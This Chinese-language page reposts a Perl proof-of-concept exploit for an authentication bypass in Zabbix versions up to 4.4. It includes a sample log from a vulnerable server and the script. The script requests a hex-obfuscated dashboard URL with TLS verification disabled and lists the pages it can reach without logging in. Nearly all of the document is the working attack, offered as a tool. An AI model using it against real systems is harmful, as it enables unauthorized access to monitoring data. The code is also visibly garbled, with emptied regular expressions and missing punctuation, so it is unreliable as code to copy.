Zabbix 全系列 Authentication Bypass 利用工具
来源:https://cxsecurity.com/issue/WLB-2019100030
Zabbix(Zabbix <= 4.4 )认证绕过利用代码: # !/usr/bin/perl -w# # Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit# # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com># # # [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com># # [ Initializing the browser# # [ >>> Referer => # # [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1# # [ >>> Content-Type => application/x-www-form-urlencoded# # [ <<< Cache-Control => no-store, no-cache, must-revalidate# # [ <<< Connection => close# # [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT# # [ <<< Pragma => no-cache# # [ <<< Server => nginx# # [ <<< Vary => Accept-Encoding# # [ <<< Content-Type => text/html; charset=UTF-8# # [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT# # [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT# # [ <<< Client-Peer => # # [ <<< Client-Response-Num => 1# # [ <<< Client-SSL-Cert-Issuer => # # [ <<< Client-SSL-Cert-Subject => # # [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256# # [ <<< Client-SSL-Socket-Class => IO::Socket::SSL# # [ <<< Client-SSL-Warning => Peer certificate not verified# # [ <<< Client-Transfer-Encoding => chunked# # [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css"# # [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly# # [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload# # [ <<< Title => TARGET: Dashboard# # [ <<< X-Content-Type-Options => nosniff# # [ <<< X-Frame-Options => SAMEORIGIN# # [ <<< X-Meta-Author => Zabbix SIA# # [ <<< X-Meta-Charset => utf-8# # [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d# # [ <<< X-Meta-Msapplication-Config => none# # [ <<< X-Meta-Msapplication-TileColor => #d40000# # [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png# # [ <<< X-Meta-Viewport => width=device-width, initial-scale=1# # [ <<< X-UA-Compatible => IE=Edge# # [ <<< X-XSS-Protection => 1; mode=block# # [# # [ The target is vulnerable. Try to open these links:# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1# # [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1# # [ https://TARGET/zabbix/overview.php?ddreset=1# # [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1# # [ https://TARGET/zabbix/latest.php?ddreset=1# # [ https://TARGET/zabbix/charts.php?ddreset=1# # [ https://TARGET/zabbix/screens.php?ddreset=1# # [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1# # [ https://TARGET/zabbix/srv_status.php?ddreset=1# # [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1# # [ https://TARGET/zabbix/hostinventories.php?ddreset=1# # [ https://TARGET/zabbix/report2.php?ddreset=1# # [ https://TARGET/zabbix/toptriggers.php?ddreset=1# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.list# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1# use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
my $host = shift || ' ' # Full path url to the store$host =~ s ||| print " \033 [2J" # clear the screenprint " \033 [0;0H" # jump to 0,0print " [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit\n " print " [ Exploit Author: Todor Donev 2019 <todor.donev\@ gmail.com>\n " print " [ e.g. perl $0 https://target:port/\n " and exit if ($host !~ m // print " [ Initializing the browser\n " my $user_agent = rand_ua(" browsers" my $browser = LWP::UserAgent-> new(protocols_allowed => [' http' ' https' ssl_opts => { verify_hostname => 0 });
$browser -> timeout(30);
$browser -> agent($user_agent );
my $target = $host ." \x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31 " my $request = HTTP::Request-> new (GET => $target ,[Content_Type => " application/x-www-form-urlencoded" Referer => $host ]);
my $response = $browser -> request($request );
print " [ >>> $_ => " $request -> header($_ ), " \n " for $request -> header_field_names;
print " [ <<< $_ => " $response -> header($_ ), " \n " for $response -> header_field_names;
print " [ Exploit failed! 401 Unauthorized!\n " and exit if ($response -> code eq ' 401' print " [ Exploit failed! 403 Forbidden!\n " and exit if ($response -> code eq ' 403' if (defined ($response -> as_string()) && ($response -> as_string() =~ m // print " [\n [ The target is vulnerable. Try to open these links:\n " my $tree = HTML::TreeBuilder-> new_from_content($response -> as_string());
my @files = $tree -> look_down(_tag => ' a' for my $line (@files ){
next if ($line -> attr(' href' m // next if ($line -> attr(' href' m /\# / next if ($line -> attr(' href' m // print " [ " $host ." /zabbix/" $line -> attr(' href' " \n " else {
print " [ Exploit failed! The target isn't vulnerable\n " exit ;
}